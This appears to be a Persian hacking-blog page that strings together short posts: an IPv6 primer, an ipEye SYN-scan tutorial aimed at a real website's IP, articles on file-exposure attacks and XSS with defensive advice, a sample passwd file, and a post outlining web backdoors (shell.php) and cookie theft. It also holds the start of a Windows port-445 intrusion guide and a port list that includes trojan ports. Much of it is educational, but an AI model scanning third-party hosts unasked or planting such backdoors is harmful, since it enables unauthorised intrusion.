پدارم حیاتی(Pi3cH) دانشجوی رشته مهندسی فناوری اطلاعات (IT) هستم. ایده ی طراحی LinuxPH زمانی به ذهنم رسید که می خواستم طرح جدیدی را برای وب سایت پرشین هکرز طراحی کنم. در ابتدا قصد داشتم ویرایش جدید پورتال پرشین هکرز 2.0.0 را طراحی کنم قابلیت دستیابی به صفحات سایت را تنها با استفاده از کی بورد را داشته باشد ولی پس از مدتی کار روی این سیستم به این نتیجه رسیدم که کی بورد تنها جواب گوی کلیه نیاز ها نمی تواند باشد و درکنار آن حتما نیاز به استفاده از موس هست این شد که تصمیم گرفتم در این سیستم جای موس را خالی نکنم. چون دستورات یا command های محیط ویندوز در برابر لینوکس قابل مقایسه نیست سعی کردم بیشتر از شکل و ساختار دستورات لینوکس در این سیستم استفاده کنم و از آنجا نام LinuxPH که تلفیقی از کلمه لینوکس و مخفف حروف پرشین هکرز (و هم نام و نام خانوادگی خودم!) می باشد را روی آن قرار دهم. برنامه نویسی و طراحی قالب LinuxPH زمان بسیار زیادی را از من گرفت چون سعی کردم از آیکون های موجود در محیط KDE RedHat یا آیکون ها Suse استفاده کنم تا ظاهر LinuxPH نیز آشنای لینوکس کاران باشد. دستوراتی که در این ویرایش از LinuxPH قرار داده ام محدود می باشد ولی به مرور به دستورات آن اضافه می کنم. اگر شما عزیزان نیز توانایی همکاری با من در توسعه این سیستم را دارید حتما با من مکاتبه کنید در این سیستم حتی شما می توانیید یک دستور بنویسید و با نام و کپی رایت خودتان به ثبت برسانید. محیط برنامه نویسی LinuxPH برنامه PHP4  و بانک اطلاعاتی آن MySql می باشد. قسمت دستورات به تمامی به صورت شیئی گرا(OOP) برنامه نویسی شده است. هم این جا از اشکان عزیز(http://www.amoozeshi.com/) بخاطر طراحی لوگو بالای سایت کمال تشکر را دارم. واقعا یک لوگوی بسیار زیبا با فونتی زیباتر طراحی کرده اند (خودم هم یک خورده تغییرش دادم!). طرح اصلی آرم پرشین هکرز توسط علی عزیز(Aliix - http://www.corelist.net/) انجام شده که بعلت مشغله کاری نتوانست ما را در طراحی لوگو جدید یاری کند. باز از زحمات این دو عزیز تشکر می کنم. محیط LinuxPH را طوری طراحی کرده ام که براحتی می توان قالب آن را تغییر داد (مثل اسکین ها در مدیا پلیر) در صورتی که تمایل دارید قالبی را برای LinuxPH طراحی کنید حتما با من تماس بگیرید. در انتها اضافه می کنم که LinuxPH دارای یکسری دستورات مخفی می باشد که واقعا قابلیت های جالبی را روی وب ایجاد کرده است که تنها قابل استفاده برای کاربران خاص پرشین هکرز می باشد در آینده بیشتر با این دستورات آشنا خواهید شد. به امید روزی که وب سایت های ایرانی و یا فارسی زبان نمونه ی خارجی نداشته باشند و همواره با ایده های جدید که بر روی آنها اجرا می شود جهانیان را حیرت زده کنند!

نقش يك پروتكل اينترنتي

با تغيير ماهيت اينترنت و شبكه هاي تجاري، IP موجود كه ستون فقرات شبكه هاي TCP/IP را تشكيل مي داد رو به منسوخ شدن و كهنگي مي رفت.در گذشته از اينترنت براي انتقال فايل ها، نامه هاي الكترونيكي و دسترسي از راه دور به وسيله Telnet استفاده مي شد اما امروزه در اينترنت شاهد فزوني برنامه هاي صوتي و تصويري ، نرم افزارهاي كاربردي توانمند هستيم كه باعث جلب محبوبيت و جذابيت وب شده اند. كمپانيها با ايجاد شعبه هاي مختلف مجموعه اي از محيط هاي Client/Server تحت شبكه به وجود آوردند كه باعث افزايش روز افزون اينترانت ها شد، تمام اين توسعه ها باعث كاهش تواناييهاي شبكه هاي بر پايه IP شده و شبكه ها نياز به پشتيباني ترافيك هاي فوري ، كنترل انعطاف پذيري تراكم ترافيك ها و ايجاد خصوصيات امنيتي پيدا كردند، اين توسعه و نيازها موجب به اتمام رسيدن طول عمر آدرس دهي هاي موجود طبق IPv4 شد.

خيلي زود آدرس دهي جديدي جايگزين آدرس دهي قديم شد كه IPv6 نام گرفت. آدرس دهي Ip باعث ايجاد ارتباط سيستم ها از طريق شبكه هاي مختلف مي شود در نتيجه كليه ايستگاه ها و مسيرياب ها به داشتن يك آدرس ملزم مي شوند تا به ايجاد ارتباط بين آن ها منتهي شود.

Router (مسير ياب) بايد قادر باشد اطلاعات شبكه هاي مختلف را با ساختارهاي مختلف انتقال داده و به مقصد مورد نظر بفرستد، اين امر مستلزم فراهم آوردن سرويس هاي زير مي باشد:

· نماي آدرس دهي : همه شبكه ها از يك ساختار هماهنگ براي آدرس دهي استفاده نمي كنند به عنوان مثال يك شبكه IEEE 802.3 با 16bit or 48bit فضاي آدرس دهي ، يك شبكه X.25 با 12 Digit decimal آدرس دهي و...

· بزرگترين اندازه بسته هاي اطلاعاتي : بسته های اطلاعاتی يک شبکه ممکن است به قسمتهای کوچک تر تقسيم شده تا قابل انتقال به شبکه های ديگر باشد « به اين عمل fragmentation مي گويند» به عنوان مثال بزرگترين اندازه بسته های اطلاعاتي برای شبکه های Ethernet 1500بايت می باشد برای شبکه های X.25 1000 است در اين صورت مسيرياب بايد برای انتقال اطلاعات از شبکه های Ethernet به شبکه های X.25 بسته های اطلاعات را به 2 قسمت تقسيم کند.

· رابط هاي شبكه Interfaces)) :ارتباط دهنده های سخت افزاری و نرم افزاری در شبکه های مختلف متفاوت می باشد که مسيرياب بايد قدرت تشخيص اين اختلافات را داشته باشد.

· قابليت اطمينان : سرويسهاي مختلف يك شبكه ممكن است از ابتدا تا انتها به صورت يك سرويس قابل اعتماد در يك حلقه مجازي تا يك سرويس غير قابل اعتماد قابل تغيير باشند. عملكرد يك مسرياب نبايد وابسته به قابليت اعتماد يك شبكه باشد.

در نتيجه اين IP مطمئن نيست چون درستي رسيدن اطلاعات را تضمين نمی کند و مسووليت سالم رسيدن بسته های اطلاعاتي را به پروتکل لايه بالايي (TCP) می سپارد به اين شکل Error recovery توسط TCP صورت می پذيرد اين امر تا حد زيادی قابليـت انعطاف پذيری را فراهم می آورد.



ايجاد يك پروتكل جديد:

وقتي اينترنت روزبه روز رشد کرد و نقايص IPv4 بيشتر آشکار شد برای پاسخ به نيازهای جديد می بايست راهی انديشيده می شد درنتيجه اين درخواست ها IETF ..... در سال 1992 اولين طرح خود را به عنوان IP جديد ارائه داد که پس از طراحی نهايي در سال 1994 بيرون آمد که بعد از آن تغييراتی روی آن داده شد و بالاخره IPv6 نام گرفت. پيشبرد IPv6 بيشتر به خاطر نداشتن محدوديـت های آدرس دهی در IPv4 می باشد که البته اين IP جديد علاوه بر آن قابليت های ديگری هم دارد که به شرح آنها خواهيم پرداخت.

آدرس دهي

با 32 بيت فضای آدرس دهی تنها 2 به توان 32 آدرس مختلف می توان ايجاد کرد که حدود 4 ميليارد آدرس است اين فضای آدرس دهی در اينترنت روبه رشد فضای محدودی است از سال 1980 به بعد دريافتن که ديگر اين مقدار فضا جواب گوی نيازها نيست و در سال 1990 اين مشکل به طور آشکار نمايان شد. دلايل نامناسبی 32 بيـت فضای آدرس دهی به شرح زير می باشد:



· دوساختار از IP Address شامل Net ID و Host ID که راحت و مناسب است اما با فضای آدرس دهی محدود. يك مرتبه كه به شبكه خود تعدادي از آدرسها را اختصاص مي دهيد براي همه شبكه هاي ميزبان نيز مي توانيد از اين آدرسهاي استفاده كنيد. فضاي آدرس دهي براي آن شبكه ممكن است به صورت گسترده اي استفاده شود البته بدون اينكه شما نگران از دست دادن كارايي آن باشيد.

· اين يك تمرين عمومي براي اختصاص دادن تعدادي از آدرس هاي IP به شبكه هايي مي باشد كه به صورت واقعي به اينترنت متصل مي باشند. اين موضوع براي شبكه هاي مخفي اينترنتي كه تعدادي از اين آدرسها را استفاده مي كنند ، امكان پذير مي باشد. اما براي استفاده از آنها كمي ريسك وجود دارد.

· شبکه ها به سرعت رو به افزايش هستند. اغلب سازمان ها چندين Lan دارند. شبکه های بی سيم به تدريج نقش اساسي يافته اند همچنين رشد اينترنت درسالهای آتي رو به انفجار است.

· افزايش استفاده از TCP/Ip در مناطق جديد خواستار IP های خاص (unique ip address) می باشد. مثل ارتباط نقاط الکترونيکی يا کابل تلوزيون گيرنده ها.....

· به طور کلي دادن يک IP به هر ايستگاه کاری ....

برای داشتن اين آدرس ها Ipv6 از 128 بيت فضای آدرس دهی در عوض 32 بيت استفاده می کند و اين امر فضای آدرس دهی را از 2 به توان 32 به 2 به توان 96 می رساند که البته امن تر و مطمئن تر نيز می باشد.

 چگونه از ipEye برای پورت اسکنينگ استفاده کنيم؟

با تايپ ipEye در command prompt اين نتايج ظاهر می‌شود:
ipEye 1.2 - © 2000-2001, Arne Vidstrom (arne.vidstrom@ntsecurity.nu) - http://ntsecurity.nu/toolbox/ipeye/ Error: Too few parameters. Usage: ipEye -p [optional parameters] ipEye -p [optional parameters] is one of the following: -syn = SYN scan -fin = FIN scan -null = Null scan -xmas = Xmas scan>br> (note: FIN, Null and Xmas scans don"t work against Windows systems. [optional parameters] are selected from the following: -sip = source IP for the scan -sp = source port for the scan -d = delay between scanned ports in milliseconds (default set to 750 ms)

فرض کنيد که می‌خواهيم سايت سازين را از نظر پورت‌ها از پورت ۱ تا ۲۰۰ تست کنيم. اول بايد ip آن را به دست بياوريم که می‌شود، 63.148.227.65 و حالا به کمک دستور زير آن را بررسی می‌کنيم:
ipeye 63.148.227.65 -syn -p 1 200
دقت کنيد که 63.148.227.65 عدد ip سازين، syn- يعنی SYN SCAN و p 1 200- يعنی تست از پورت ۱ تا ۲۰۰ باشد. البته پارامترهای ديگری را هم می‌شود ست کرد که فعلا به درد ما نمی‌خورد. با اجرای اين دستور به نتايج زير می‌رسيم:
ipEye 1.2 - © 2000-2001, Arne Vidstrom (arne.vidstrom@ntsecurity.nu) - http://ntsecurity.nu/toolbox/ipeye/ 1-20 [drop] 21 [open] 22 [closed or reject] 23-24 [drop] 25 [open] 26-52 [drop] 53 [open] 54-79 [drop] 80 [open] 81-109 [drop] 110 [open] 111-142 [drop] 143 [open] 144-200 [drop] 201-65535 [not scanned]
Closed يعنی کامپيوتر در آن طرف هست ولی به پورت گوش نمی‌دهد، Reject يعنی اينکه يک firewall هست که اجازه اتصال به آن پورت را نمی‌دهد، Drop يعنی اينکه يک firewall همه‌چيز را پس‌ می‌زند و يا اصلا کامپيوتری اونور نيست، Open هم که يعنی باز.
در مورد سازين می‌بينيد که از بين پورت‌های ۱ تا ۲۰۰ ، پورت‌های ۲۱، ۲۵، ۵۳، ۸۰، ۱۱۰، ۱۴۳ باز است و می‌توان به‌ آنها telnet کرد. دقت کنيد که تا تمام پورت‌هايی که مشخص شده، تست نشده است، هيچ نتيجه‌ای نشان داده نمی‌شود و يه‌کم صبر می‌خواد

مقدمه : در این مقاله به شرح حملات Exposure و انواع آن می پردازیم.

Exposure چیست ؟
Exposure یک دسته از حملات بدست گیری اطلاعات ( Disclosure) می باشد با این تفاوت که در Exposure نفوزگر اطلاعات مورد نظر خود را بصورت یک فایل دانلود می کند. Exposure در روی وب سرور به معنای دانلود کرد سورس صفحات پویا ، فایل های کانفیگ ( جای که تنظیمات وب ذخره می شود) و دیتا بیس ها می باشد البته Exposure در وب به معنای کلی دانلود شدن هر اطلاعاتی ( فایل) از دومین قربانی بصورت غیر قانونی می باشد.به هر صورت Exposure در وب بیشتر در زمینه بدست اوردن صفحات پویا کاربرد دارد. Exposure در اف تی پی هم به معنای بدست اوردن فایل ها یی بجز فایل های Share شده می باشد برفرض دریافت فایل Passwd در لینوکس توسط ا ین دسته حمله ها صورت می گیرد
البته لغتExposure در اف تی پی زیاد استفاده نمی شود.
براي توضيحات بيشتر در مورد حملات Disclosure به آدرس زير رجوع كنيد :
http://forums.persianhacker.net/index.php?showtopic=934

Exposure برای دریافت صفحات پویا
در سرویس دهنده ها ی گوناگون وب همیشه مشکل عدم سازگاری اسکریپت های سمت سرور وجود دارد.استفاده ازنوع خاصی از صفحات پویا در سروری که آنرا پشتیبانی نمی کند باعث می شود سرویس دهند کل فایل را به مرورگر بفرستد که دراینصورت بعضی از مرورگر ها یه کاربر هشدار می دهند که وب سرور در حال فرستادن یک فایل به کامپیوتر می باشد.دقیق تر بررسی می کنیم که چه روندی طی می شود تا یک فایل لز سایت آسیب پذیر خود به خود به مرورگر منتقل می شود.در ابتدا مرورگر از سایت صفحه ی خاصی را درخواست می کند. صفحه ی درخواستی داری پیوند به یک صفحه ی پویا می باشد.برنامه نویسی که این صفحه را طراحی کرده است انتظار داشته تا با ارجاع دادن اطلاعات توسط یک لینک به صفحه ی پویا
اطلاعات توسط صفحه پویا پردازش شوند اما به علت آنکه وب سروری که سایت در آن قرار دارد آن نوع صفحه ی پویا را پشتیباتی نمی کند پس سرویس دهنده ی وب با صفحه ی پویا مانند یک فایل ناشناخته برخورد می کند وطبق درخواست ( از طریق پیوند) فایل نا شناخته را ( که دسترسی آن بصورت پیشفرض محدود نشده) به مرورگر می فرستد دقیقا ماند آنکه شما توسط یک پیوند فایل خاصی را بخواهید از سایت دانلود کنید.

حملات Exposure چگونه صورت می گیرند ؟
همیشه Exposure به واضحی فوق نمی باشد به این معنی که ممکن است کاربری که از سایت استفاده ی عادی می کند براحتی با صفحات پویا کار کند و به کد هیچکدام از آنها دسترسی نداسته باشد ولی باز هم به علت تنظیمات نادرست نفوزگر می تواند از حفره های موجود استفاده کرده و صفحات پویا را بدست آورد.برای بدست آوردن صفحات پویا نفوزگر ابتدا لیستی از دایرکتوری های وب بدست می آورد معمولا از حفره های سرویس Webdav هم استفاده می شود. اکنون سعی می کند نقشه ای از طرح سطحی سایت بدست بیاورد بعد از بدست آوردن نقشه ی سطحی سایت سعی می کند توسط دستورات گوناگون اچ تی تی پی (از طریق Achilles و یا استفاده از URL ) صفحات پویا را بدست آورد.

یک نفوزگر چگونه با استفاده از Exposure حمله می کند ؟
بعد از بدست آوردن فایل های صفحات پویا نفوزگر نقشه ی زیر ساخت سایت را بدست می آورد و تکمیل می کند.
همانطورکه می دانید سایت ها برای ذخیره سازی اطلاعات از 3 روش می تواند استفاده کنند :
1- استفاده از فضای دومین و اف تی پی ( یا از طریق ظبط فایل های نوشتاری و یا از طریق پایگاه داده ای که بصورت لوکال ایجاد و ذخیره می شود )
2- استفاده از پایگاه داده سرور ( استفاده از سروریس دهندگانی مانند SQL Server و یا Oracle )
3- استفاده از منابع خارجی ( Mailto و Virtual Space و .... )
سایت آسیب پذیر برای ذخیره سازی :
اگر از روش اول استفاده کند نفوزگر آدرس لوکال محل ذخیره سازی اطلاعات را براحتی پیدا می کند و آنرا دانلود می کند و یا اگر دسترسی به فایل محدود باشد از روش های دیگر با استفاده ار اطلاعات بدست آمده از طرح زیر ساخت سایت به منبع اطلاعلتی دسترسی پیدا می کند
اگر از روش دوم برای ذخیره سازی استفاده کند نفوزگر فایلی که در آن پسورد و ای دی و مشخصات سرور پایگاه داده ذخیره شده است بدست می آورد و براحتی با اتصال به اس کیو ال سرور به اطلاعات دسترسی پیدا می کند البته اگر سرور پایگاه داده اجازه دسترسی ریموت را ندهد نفوزگر با گرفتن فضایی اندک و موقتی در هاست سایت آسیب پذیر؛ دسترسی لوکال برای خود ایجاد می کند.

نکته : مسئولین هاستینگ باید بر کاربران خود دقت لازم وکافی داشته باشند زیرا بسیاری از حفره ها فقط با دسترسی لوکال قابل سوءاستفاده هستند علاوه بر آنکه دسترسی لوکال برای خود هاستینگ خطر آفرین است برای کاربران دیگر هم مشکل آساست .

اگر سایت از روش سوم استفاده می کند نفوزگر اطلاعات اتصال ریموت را بدست می آورد و بدین وسیله سعی بر اتصال به منبع اطلاعاتی ریموت می کند.

چگونه سایت خود را از این دسته حملات حفظ کنیم ؟
1-باید سرور امنی را برای هاستینگ سایت خود انتخاب کنید.
2-سعی کنید قبل از انتخاب هاست مشخصات کامل آنرا با نیاز های خود تطبیق دهید.
3-قبل از آپلود کردن فایل های خود در فضای وب حتما با مسئولیت هاست خود در مورد برنامه هایی که در صفحات وب خود بکار بردید صحبت کنید.
4-حتما چندین بار تنظیمات دومین خود را بررسی کنید تا دسترسی های غیر ضروری به فایلی خاص را محدود کنید.
5-حتما فایل های حیاتی که حاوی تنظیمات پایگاه داده می باشند در جایی امن با دسترسی بسیار محدود قرار دهید.
6-سعی کنید تا جای ممکن از فایل های نوشتاری برای ذخیره اطلاعات استفاده نکنید
7-سعی کنید از هاستینگی استفاده کنید که از سرور ها ی پایگاه داده استفاده می کند.
8-حتما بعد از نصب کامل سایت و بعد از هر تغییر در آن خودتان سعی کنید حفره ها ی سایتتان را قبل از آنکه دیر سده باشد پیدا کنید
9-سعی کنید تا جای ممکن از پورتال هایی که بصورت آماده وجود دارند استفاده نکنید و سعی کنید قالب سایتتان را خودتان طراحی کنید و از قالب های از پیش نوشته شده استفاده نکنید.

امیدوارم ادمین ها و مسئولین امنیتی کشور به این حملات دقت داشته باشند زیرا سایت های کشور هنوز به این نوع حملات ایمن نشده اند.

اگر سوالی هم براتون مطرح شد می تونید با من ( devil_box) تماس بگیرید.

موفق باشید

تو این قسمت می خوام در مورد فایل passwd در سیستم های یونیکس یه توضیح مختصری بدم براتون.
خوب آدرسش که اینه:etc/passwd .
این فایل حاوی یه سری اطلاعات در مورد کاربران و account ها روی یه ماشین یونیکسه.
در واقع این فایل اکانت های روی یه ماشین رو ایجاد / کنترل و مدیریت می کنه. نکته ای که باید مورد توجه قرار بگیره اینه که این فایل با سطح اختیارات ریشه (Root ) قابل ویرایش هست !(البته یه سری راه هم وجود داره که کاربران عادی هم بتونن تغییرش بد ن که جاش ایتجا نیس بگم ولی بعدا می گم .)
خوب همه می دونیم که فایل های passwd خیلی تابلون پس واسه این که از تابلوئی اونا کاسته شه در برخی موارد رمزهای کاربران در یه فایل دیگه به نام shadow (هم اسم منه!) نگه داری می شن.
خوب یه مثال از محتویات یه فایل passwd اینجا می زنم:

QUOTE

root:$1$fgstu12e$hyh5jf4lk0/5ghh87kjfrr/:0:0:root:/root:/bin/bash bin:*:1:1bin:/bin: daemnon:*:2:2:daemon:/sbin: ftp:*:14:50:FTP: USER/home/ftp:/ nobody:*:99:99:Nobody:/: shadow:$1$jdjhdsfl4$rwbxy1e/gr0shs6e:100:100:shadow nsh.User:/home/users/shadow/:bin/bash

با سلام

در اين مقاله به برسي چگونگي مقابله با CSS/XSS مي پردازيم

مي دانيم كه CSS/XSS از ضعف صفحات پويا استفاده مي كند .
پس طبيعتا براي جلوگيري از اين حمله بايد صفحات پويا را ايمن كرد.
براي ايمن كردن يك صفحه پويا در برابر CSS/XSS بايد كد نويسي آنرا تغيير داد.

خب براي راحتر شدن كار از يك مثال استفاده مي كنيم
يك صفحه ي پويا با نام asib_pazir.php داريم كه آرگومان هاي a و b را مقداري دهي مي كند و به صفحه باز مي گرداند و صفحه نيز نتايج آنها را به صورت دستورات HTML به مرورگر باز مي گرداند ارگومان اول يك نام را دريافت مي كند و ارگومان دوم يك عدد را كه سايز فونت را تعيين مي كند مقدار دهي
مي كند و صفحه با اين 2 آرگومان صفحه ي HTML يي با كد زير را بر مي گيرداند

arguman aval

براي يك هكر دانستن سورس صفحه ي پويا مهم است ولي در اين مثال هكر فقط با ديدن نتيجه و دستكاري كردن ورودي ها حفره را كشف مي كند
خب اكنون هكر ارگومان يك را خالي مي گذارد و ارگومان دوم را زيركانه بصورت زير ست ميكند
asib_pazir.php?b=2">hi

hi

hi

خب واضح است كه هركسي اين صفحه را باز كند كد جاوا را نيز ناخودآگاه اجرا م ي كند
براي جلوگيري از اينجور آسيب پذيزي ها روش هاي زير به برنامه نويسان وب و ادمين هاي محترم پيشنهاد مي شود.
1-هرگز يك ارگومان را بدون برسي رها نكنيد و حتما رشتهي ورودي را چندين بار فيلتر كنيد تا كد ناخواسته وارد و اجرا نشود.
2-سعي كنيد با پيكر بندي مناسب وب سورس صفحات پويا را از ديد عموم پنهان نگه داريد.
3-تا حد امكان از Engine هاي وب و پورتال هاي از پيش نوشته شده استفاده نكنيد.
4-دسترسي به پنل ادمين را فقط محدود به كوكي و حتي پسورد نكنيد سعي كنيد چندين مرحله براي دسترسي به پنل ادمين طراحي كنيد.(اين مورد در CSS/XSS Injection اهميت بيشتري دارد)
5-با وجود آنكه اين باگ ها فراوان و اكثرا كم خطر هستند آنها را دست كم نگيريد
6-هر چند وقت يك بار سايت خود را توسط يك تيم امنيتي ازمايش كنيد تا مشكلات سايت خود را قبل از آنكه دير شود رفع كنيد
7-سعي كنيد ارگومان هاي كمتري بگيريد و بيشتر از مقادير پيش فرض در خود سورس صفحه ي پويا استفاده كنيد
8-هميشه اطلاعات فني خود را بروز نگه داريد

موفق باشيد

با سلام

در این مقاله به برسی چگونگی نفوز به اپلیکیشن های وب از طریق CSS Injection می پردازیم

همانطور که گفته شد CSS Injection با عث اجرای اسکریپت در کامپیوتر قربانی می شود .
بايد برسي كنيم اسكريپت ما كجا اجرا مي شه !
خب ما 2 حالت داريم

اسكريپت در سرور اجرا بشه :
مانند صفحات كامنتي كه كامنت رو يك فايل خاص بدون تغيير ذخيره مي كنند
كه از اين طريق يك بكدور تحت وب ايجاد مي كنيم يعني يك صفحه ي پويا كه به ما اجازه دسترسي ادمين رو در فضاي وب مي ده براي مثال shell.php

اسكريپت در كلاينت اجرا بشه :
مانند صفحات انجمني كه كد هاي HTML رو فيلتر نمي كنند
كه از اين طريق يك اسكريپت تزريق مي شود تا بصورت مخفي يك صفحه ديگر حاوي كدهاي مخرب هكر اجرا شود
مثلا :
روش کوکی مانچینگ
ابتدا كد مورد نظر در مرورگر كلاينت بازديد كننده از سايت آسيب پذير اجرا مي شود و محتويات كوكي بازديد كننده ( كه حتي ممكن است ادمين سايت باشد) براي هكر فرستاده مي شود

دقت كنيد :

اطلاعاتي گفته شد براي ادمين ها بسيار ضروري است زيرا مشاهده مي شود اكثر سايت هايي كه بنوعي از فيد بك ها و كامنت ها استفاده ميكنند به اين باگ يعني CSS Injection آسيب پذير هستند.

مطلبي كه در اينجا ميخوانيد يكمي پيچيده است بنابراين اصلا نگران نباشيد گام به گام با اين متن پيش برويد سعي ميكنم خيلي ساده عنوان كنم اصلا نگران نباشيد
خلاصه كاري كه ما ميكنيم اين است كه ما با كارهاي زير ميخواهيم به ويندوز 2000 يا ايكس پي حمله كنيم از بيرون دستگاه بدون اينكه به قرباني فايلي بديم اجرا كنه يا هر ارتباط ديگري با قرباني داشته باشيم يعني ميخوايم خيلي حرفه اي نه مثل اين هكر هاي تازه كار كه تروجان ميدن به مردم خيلي حرفه اي خودمان ميخوايم يك پورت روي دستگاه قرباني باز كنيم بدون اينكه حتي يك كلمه هم با قرباني حرف بزنيم خوب حالا كه فهميديد چيكار ميخوام بكنيم من يكبار ديگه هم خلاصه بگم يك اي پي انتخاب ميكنيد و بعد هكش ميكنيد اولين كاري كه ميكنيم اين است كه اي پي مورد نظر يا همان قرباني را براي باز بودن پورت 445 امتحان ميكنيم
Start->run->CMD
را براي باز كردن يك صفحه كامند پرومت ...

 

به علت طولانی بودن در ادامه مطلب

ادامه مطلب

انواع هکرها:

 

1- گروه نفوذگران کلاه سفيد: (white hat hackers) : هر کسي که با دانش خود بتواند از سد موانع امنيتي يک شبک بگذرد و به داخل شبکه راه پيدا کند اما اقدام خرابکارانه اي انجام ندهد را يک هکر کلاه سفيد مي خوانند. خب حتما مي گوييد عجب ترجمه سختي...

به علت طولانی بودن در ادامه مطلب است...

ادامه مطلب

ما هیچگاه نمیتوانیم شبکه های خود را کاملا" ایمن کنیم اما اگر هم روزی بخواهیم به منطق 99.9% ایمنی برسیم نمیتوانیم عامل انسان را از چک لیست های تست امنیتی خود حذف کنیم . علوم مهندسی اجتماعی یک هنر است و یاد گیری این هنر برای کلیه کارمندان و مدیران سازمان ها ضرورت دارد تا افشای اطلاعات از طریق عامل انسان را به صفر برسانند . در این مقاله به بررسی علمی تفکرات انسان تا تکنیک هایی که متخصصان نفوذ در کار های خود برای تحریک اشخاص به کار میگیرند همراه با مثال های جامع پرداخته میشود .اگر با این علم در هیچ حدی آشنایی ندارید پس جالب است بدانید مهاجمین خبره قادرند بدون هیچ گونه تماس فیزیکی , به اطلاعات و مستندات حساس شما دسترسی پیدا کنند . آنها با وانمود کردن خود به عنوان یکی از کارمندان دیگر شعب , شرکا و یا حتی کارمند بخش های داخلی سازمان , تلاش میکنند تا با اغفال افراد و تحریکآنها با تکنیک های خاص خود که به توضیح مفصل در مورد آن خواهم پرداخت بپردازند . مهندسی اجتماعی تنها در علوم کامپیوتر و سازمان های کامپیوتری کاربرد ندارد , خود شما روزانه شاید چندین بار از آن برای پیشبرد اهداف خود استفاده نمایید چه در کار های روزمره و برخورد با اشخاص و چه در هنگامی که برای اولین بار به یک سازمان یا هر مکانی دیگری برای انجام کاری همچون شرکت در مناقصات یا خرید خودرو میروید اما هدف شما از بهره گیری مهندسی اجتماعی سواستفاده نبوده و صرفا" قصد پیشبرد سریعتر کار های خود را دارید . مهاجمین همیشه با اهداف از پیش تعریف شده و آگاهی کامل اقدام به ایجاد یک تماس تلفنی یا انجام یک رابطه فیزیکی با شخص مورد نظرشان مینمایند که در این برخورد هاآنها خود را یکی از مدیران , کارمندان,  کارفرمایان و... معرفی میکنند و بعد از ایجاد اطمینان اقدام به سرقت نام های کاربری و رمز عبور یا هر اطلاعات مهم دیگری میکنند . حقیقتا" این علم بسیار فرا تر از مقاله ای میباشد که در جلوی شما قرار دارد و تمام گستردگی این علوم در تجارب و برخورد هایی که شما باآنها مواجه خواهید شد نهفته است . بسیاری از شرکت ها و موسسات بزرگ همچون بانک ها و سازمان های دولتی از آموزش این علوم و بیان اهمیت آن به کارمندان خود صرف نظر میکنند اماآنها میبایست آگاه باشند که میتوانند با هزینه ای کاملا" ناچیز جلوی مشکلات و ضرر هایی را که در آینده گریبان گیر آنان خواهد شد را بگیرند . آیا ما میتوانیم منکر گزارشات وخیم سال 2004 سازمان InfoSecurity اروپا شویم ؟

یک شخص با قابلیت مهندسی اجتماعی کیست ؟

انواع مهندسین اجتماعی

روان شناسی اجتماعی در کل هفت نوع عامل ایجاد تحریک را تعریف میکند

•        حس انطباق پذیری

•        منطق و استدلال

•        نیاز و احساسات

•        اعتبارات و ترس

•        مساعدت هدفمند

•        شباهت کاذب

•        مانوراطلاعاتی

ویژگی های یک مهندس اجتماعی موفق

•         بردباری

•         اطمینان

•         آگاهی

دریافت مقاله به صورت کامل از سایت امنیتی آشیانه به صورت فایل PDF

 

 خلاصه درس: ليست تکميلي پورت‌ها را بررسي مي‌کنيم. بحث telnet را ادامه مي‌دهيم و مطالبي را که آموختيم را جمع‌بندي مي‌کنيم.

 
◊ تکميل ليست پورت‌ها
در جلسه دوم در مورد مهمترين پورت‌ها صحبت کردم. حالا يک ليست کامل‌تر را در اين درس مي‌گم. اگر مي‌خواهيد يک مرجع نسبتا کامل براي مراجعه داشته باشيد، اينجا را کليک کنيد. دقت کنيد درس امروز و نيز لينک بالا هيچ بحثي در مورد تروجان‌ها نمي‌کند زيرا تروجان‌هاي شناخته شده هم يک سري پورت پيش‌فرض دارند که در جاي خود بحث خواهد شد.
Ports   TCP/UDP     Service or Application
------  -------     ----------------------------------------
 7        tcp        echo
 11       tcp        systat
 19       tcp        chargen
 21       tcp        ftp-data
 22       tcp        ssh
 23       tcp        telnet
 25       tcp        smtp
 42       tcp        nameserver
 43       tcp        whois
 49       udp        tacacs
 53       udp        dns-lookup
 53       tcp        dns-zone
 66       tcp        oracle-sqlnet
 69       udp        tftp
 79       tcp        finger
 80       tcp        http
 81       tcp        alternative for http
 88       tcp        kerberos or alternative for http
 109      tcp        pop2
 110      tcp        pop3
 111      tcp        sunrpc
 118      tcp        sqlserv
 119      tcp        nntp
 135      tcp        ntrpc-or-dec
 139      tcp        netbios
 143      tcp        imap
 161      udp        snmp
 162      udp        snmp-trap
 179      tcp        bgp
 256      tcp        snmp-checkpoint
 389      tcp        ldap
 396      tcp        netware-ip
 407      tcp        timbuktu
 443      tcp        https/ssl
 445      tcp        ms-smb-alternate
 445      udp        ms-smb-alternate
 500      udp        ipsec-internet-key-exchange (ike)
 513      tcp        rlogin
 513      udp        rwho
 514      tcp        rshell
 514      udp        syslog
 515      tcp        printer
 515      udp        printer
 520      udp        router
 524      tcp        netware-ncp
 799      tcp        remotely possible
 1080     tcp        socks
 1313     tcp        bmc-patrol-db
 1352     tcp        notes
 1433     tcp        ms-sql
 1494     tcp        citrix
 1498     tcp        sybase-sql-anywhere
 1524     tcp        ingres-lock
 1525     tcp        oracle-srv
 1527     tcp        oracle-tli
 1723     tcp        pptp
 1745     tcp        winsock-proxy
 2000     tcp        remotely-anywhere
 2001     tcp        cisco-mgmt
 2049     tcp        nfs
 2301     tcp        compaq-web
 2447     tcp        openview
 2998     tcp        realsecure
 3268     tcp        ms-active-dir-global-catalog
 3268     udp        ms-active-dir-global-catalog
 3300     tcp        bmc-patrol-agent
 3306     tcp        mysql
 3351     tcp        ssql
 3389     tcp        ms-termserv
 4001     tcp        cisco-mgmt
 4045     tcp        nfs-lockd
 5631     tcp        pcanywhere
 5800     tcp        vnc
 6000     tcp        xwindows
 6001     tcp        cisco-mgmt
 6549     tcp        apc
 6667     tcp        irc
 8000     tcp        web
 8001     tcp        web
 8002     tcp        web
 8080     tcp        web
 9001     tcp        cisco-xremote
 12345    tcp        netbus
 26000    tcp        quake
 31337    udp        backorifice
 32771    tcp        rpc-solaris
 32780    udp        snmp-solaris
 43188    tcp        reachout
 65301    tcp        pcanywhere-def

 
◊ ادامه بحث telnet

